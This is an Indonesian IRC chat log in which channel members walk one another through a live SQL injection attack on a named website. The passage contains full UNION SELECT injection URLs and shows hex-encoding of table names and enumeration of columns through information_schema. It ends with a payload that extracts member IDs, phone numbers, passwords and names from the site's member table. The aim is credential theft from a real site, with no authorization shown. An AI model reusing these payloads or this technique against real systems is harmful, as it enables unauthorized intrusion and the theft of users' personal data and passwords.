<%NoGe> ga
<&home_edition2001> NoGe isa keluar gak hasilnya
<%NoGe> masih error
<&home_edition2001> wakaka
<&home_edition2001> sabar
<&home_edition2001> esia_member << di convert ke hexa
<&home_edition2001> gih sana
* live sets mode: +v chawanua
<+katro> hexa
<+katro> btr
<&home_edition2001> gw gak isa browse lag bener
<+arioo> :D
<%NoGe> eh dimana?
<+arioo> xixixx
<+arioo> pakek mysql aza bisa tuh
<+arioo> :D
* +[^]YAMAHA[^] Gebet ceweknya embat dollarnya !
<+katro> bentar gue convert
<&home_edition2001> http://www.piclist.com/techref/ascii.htm
<%NoGe> ok katro
* +arioo brb mo cari makanan dulu laperrr
<+arioo> xixix
<+arioo> :D
<&home_edition2001> paste sini
<&home_edition2001> biar gw susun ulang
<&home_edition2001> jangan lupa dikasih pemanis ya
<&home_edition2001> 0x
<&home_edition2001> wakka
<&home_edition2001> a
<&home_edition2001> kek bedak aja
<+katro> oh pake 0x
<+katro> Result:
<+katro> esia_member
<+katro> converts to:
<+katro> 65 73 69 61 5f 6d 65 6d 62 65 72
<+Ibenk_19_Hoki> koq site nya ga brubah2 dari tadi..
<+katro> 0x650x730x690x610x5f0x6d0x650x6d0x620x650x72
<&home_edition2001> 657369615F6D656D626572 << ini dodol
<&home_edition2001> jadi 0x657369615F6D656D626572
<&home_edition2001> susun lagi yu
<%NoGe> next
<%NoGe> :p
<&home_edition2001> <%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.column%20where%20table_name=0x657369615F6D656D626572%20limit%200,1--
<+katro> wekekekek
<+haLah> sama aja
<%NoGe> sama bius
<+haLah> wixiixix
<%NoGe> :))
<+katro> sloki lagi
<&home_edition2001> waka
<&home_edition2001> knapa ya
<&home_edition2001> duh
<+arioo> xixixix
<+arioo> :D
<%NoGe> tanya napa?
<%NoGe> sapa disini punya fake id?
<&home_edition2001> ok cek satu2 ya
<&home_edition2001> wakaka
<&home_edition2001> kurang s
<&home_edition2001> wakaka
<&home_edition2001> wakaka
<&home_edition2001> information_schema.column << pake s
<&home_edition2001> wakaka
<&home_edition2001> information_schema.columns
<+haLah> lol
<%NoGe> ah iya
<%NoGe> reg_id
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> Last Update 8
<%NoGe> tu
<&home_edition2001> coly2
<&home_edition2001> coly2
<&home_edition2001> coly2
<&home_edition2001> wew
<+katro> wekekek
<&home_edition2001> mantab
<&home_edition2001> lagi kek cari tabel
<%NoGe> esia_id
<%NoGe> 3
<%NoGe> [Download Document : 7]
<&home_edition2001> paste sini kolomnya semua NoGe
<&home_edition2001> wew
<&home_edition2001> wew
<&home_edition2001> wew
<%NoGe> manteb tu
<+Bukan-Diriku> Gold 0.006471 0.2013 4.86 <-- lom bisa bli rokok neh
<%NoGe> xixixi
* manusiabiasa ([email protected]) has joined #nyubicrew
<%NoGe> tu aje bius
<%NoGe> :))
<+Bukan-Diriku> Gold 0.016874 0.5248 12.67 <-- cialll... nambah lage.... Y_Y
<+katro> reg id esia id
<%NoGe> nomer
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> :))
<+chawanua> kesimpulan masih lama
<&home_edition2001> wew
<&home_edition2001> Bukan-Diriku
<&home_edition2001> swet
<&home_edition2001> mantab bgt
* live sets mode: +v manusiabiasa
<&home_edition2001> semua la biar tuntassss
<%NoGe> password
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> xixixi
<@live> MILDnet Info : CHANNEL MILDnet Network support this following channels #MILD #INDOMP3 #GANTENG #NYUBICREW #HITAMPUTIH #POET #MILW0RM
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572%20limit%204,1--
<+katro> 4,1
<%NoGe> kelamin
<%NoGe> 3
<%NoGe> [Download Document : 7]
<%NoGe> ini dia
<%NoGe> kelamin
<%NoGe> wkawkakwkawkakwa
<&home_edition2001> maksudnya
<&home_edition2001> maksudnya
<+katro> lahh kelamin
<+katro> :(
<&home_edition2001> wakaka
<&home_edition2001> wong aneh
<+katro> L/p
<+katro> :(
<%NoGe> kelamin ganda
<%NoGe> :p
<&home_edition2001> wakaka
<&home_edition2001> dodol
<+arioo> wetew
<+arioo> kwekwekwekwe
<+arioo> :D
* +arioo lirik lirik oms homo xixixixixix
<&home_edition2001> klo udah paste semua ya colomnya
<&home_edition2001> xixix
<&home_edition2001> << enak ya tinggal nyuruh2
<+katro> aduh ribet dah gue sambil kerja
* +The_Corrs ([email protected]) Quit (Ping timeout)
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572%20limit%2025,1--
<%NoGe> banyak ajah
<+arioo> kwekwekwekwewe
<+arioo> :D
<&home_edition2001> wew
<+arioo> hajarrr terusss
<&home_edition2001> masa
<+arioo> wkekwekwe
<+arioo> :D
<&home_edition2001> paste sini semua colomnya
<+katro> wakakak 25,1
<+katro> :p
* +logong ([email protected]) Quit (Quit from MILDNet: Leaving)
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572%20limit%2030,1--
* +katro cengar cengir
<%NoGe> wkawkak
<+katro> NoGe : tes 100.1
<+katro> :p
<+arioo> jiwakwkwkwkwkwakawakwawkwakwa
<+arioo> :D
<&home_edition2001> srius dol
<+katro> NoGe : tes 100,1 klo keluar mending cari table yg laen
<+katro> :p
<+arioo> iyee pak guru maaff
<+arioo> ^^!
<%NoGe> 33
<&home_edition2001> razia
<+Ibenk_19_Hoki> Hoaahhmm.. NGANTUK AWAK
<%NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572%20limit%2033,1--
<%NoGe> abis
* home_edition2001 sets mode: -h NoGe
<+Bukan-Diriku> table_name=0x657369615F75736572 <-- mending langsung ene ajah pak de....
* home_edition2001 sets mode: -o LamerCrew
ew
<&home_edition2001> mpos
* LamerCrew slaps home_edition2001 around a bit with a large trout
<&home_edition2001> mpos
<&home_edition2001> mpos
<&home_edition2001> mpos
<&home_edition2001> mpos
pletakkkkkkkkkkkk
<&home_edition2001> wakaka
<&home_edition2001> gak kena
-_-'
<&home_edition2001> gw ngeles
CBD
* LamerCrew sets mode: -o home_edition2001
<&home_edition2001> akaka
<+NoGe> udeh
bwekekkekkee
<+Bukan-Diriku> kkkeeeek
<+Bukan-Diriku> mpozz
<&home_edition2001> curang irop
<+Bukan-Diriku> macem2 ma staff
<&home_edition2001> ampun la
<&home_edition2001> wakaka
^_^
<+NoGe> udahan ya?
* +SM4LL_F15H ([email protected]_F15H.users.mildnet.org) Quit (Quit from MILDNet: )
<+chawanua> 0x657369615F6D656D626572%20limit%2030,1--
<+anti_polda> kayaknya sih gitu
<+NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572--
<+anti_polda> remark
<+anti_polda> 3
<+anti_polda> [Download Document : 7]
<+anti_polda> Last Update 8
<+chawanua> 0x657369615F6D656D626572%20limit%2035,--
<&home_edition2001> wew
<&home_edition2001> wew
* The_Corrs ([email protected]) has joined #nyubicrew
<+NoGe> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,column_name,2,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=0x657369615F6D656D626572-- <--- ene aje kata omz Bukan-Diriku
<+NoGe> :p
<+Bukan-Diriku> langsung ke inti na ajah
<+katro> yup
<+Bukan-Diriku> mosok muter2 ke esia_member
<+NoGe> he`eh
hu uh
<+manusiabiasa> xixiixixixixixi
ayo ke intinya
* anakbugis ([email protected]) has joined #nyubicrew
<+katro> email
* &home_edition2001 kelas ditutup
<+katro> 3
<+katro> [Download Document : 7]
<&home_edition2001> mpos
<+katro> Last Update 8
<+katro> password
* +Bukan-Diriku slaps LamerCrew around a bit with a large trout
<&home_edition2001> mpos
<&home_edition2001> mpos
<&home_edition2001> mpos
<+Bukan-Diriku> behhh
<&home_edition2001> mpos
<&home_edition2001> mpos
<&home_edition2001> mpos
* live sets mode: +v The_Corrs
* &home_edition2001 kelas ditutup
* &home_edition2001 kelas ditutup
* &home_edition2001 kelas ditutup
* &home_edition2001 kelas ditutup
* &home_edition2001 kelas ditutup
* &home_edition2001 kelas ditutup
beh
* &home_edition2001 kelas ditutup
<+manusiabiasa> wede
<+Bukan-Diriku> asuuuuuuuuuuuuuu
<+manusiabiasa> sadis amat
* +Bukan-Diriku ([email protected]) has left #nyubicrew
* Bukan-Diriku ([email protected]) has joined #nyubicrew
* Help sets mode: +o Bukan-Diriku
<@Bukan-Diriku> KICK home_edition2001 is a channel admin <--- -_-!!
gadisss amat si homo_edition2001 ene
nafsuu deh
<+NoGe> sapa disini punya fake id?
* live sets mode: +v anakbugis
<+[^]YAMAHA[^]> home_edition2001 kami belajar ada bayar yuran sekoyah bapak..!!
<+[^]YAMAHA[^]> :D
<+anti_polda> ya.....belum jg selesai
<@live> MILDnet Info : FORUM Visit our official FORUM at http://mildnet.net
<+anti_polda> kampret
<+manusiabiasa> ada apa neh bos
<+haLah> tauk negh
<+manusiabiasa> kok pake kampret segala
<+haLah> cape degh
<+SaPi`KeReN> reg_id
<+manusiabiasa> wedew
<+SaPi`KeReN> 3
<+SaPi`KeReN> [Download Document : 7]
<+SaPi`KeReN> Last Update 8
<+SaPi`KeReN> esia_id
<+SaPi`KeReN> 3
<+SaPi`KeReN> [Download Document : 7]
<+SaPi`KeReN> Last Update 8
<+SaPi`KeReN> nomer
<+SaPi`KeReN> 3
<+SaPi`KeReN> [Download Document : 7]
<+SaPi`KeReN> Last Update 8
* SaPi`KeReN was kicked by Help (Stop flooding!)
* SaPi`KeReN ([email protected]) has joined #nyubicrew
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20select%200,esia_id,2,nomer,4,5,6,password,nama,9,10,11%20from%20esia_member--
<&home_edition2001> hajar bleh
<+chawanua> waduch ..
anjrit....
<&home_edition2001> pasti dah ngertikan perintah ini
<&home_edition2001> wakaka
kena kick
<+manusiabiasa> aku angkat tangan lah
?
<&home_edition2001> itu gak pake concat
<&home_edition2001> coba pake concat
* Help sets mode: +h anakbugis
* live sets mode: +v SaPi`KeReN
<&home_edition2001> kaya yang pertama tadi lo
<+katro> coba pake concat <-- coba gimana hayoo
<+chawanua> 0x657369615F6D656D626572%20limit%2025,1-- first NoGe Paste
* danieL is now known as pecinta_buku_komik
* +garong ([email protected]) Quit (Quit from MILDNet: )
<&home_edition2001> NoGe
<&home_edition2001> ngerti ga
<&home_edition2001> Bukan-Diriku
<&home_edition2001> ngerti ga
<+chawanua> 0x657369615F6D656D626572%20limit%2030,1-- NoGe Paste
<@Bukan-Diriku> pala gw yang stress... bukan sql na
<+chawanua> 2025,1 <====
* +Rontok_Bro ([email protected]) Quit (Ping timeout)
<+chawanua> 2030,1-- <====
<+NoGe> sampe 33 tadi abis ne
<+katro> Result:
<+katro> 0x657369615F6D656D626572
<+katro> converts to:
<+katro> esia_member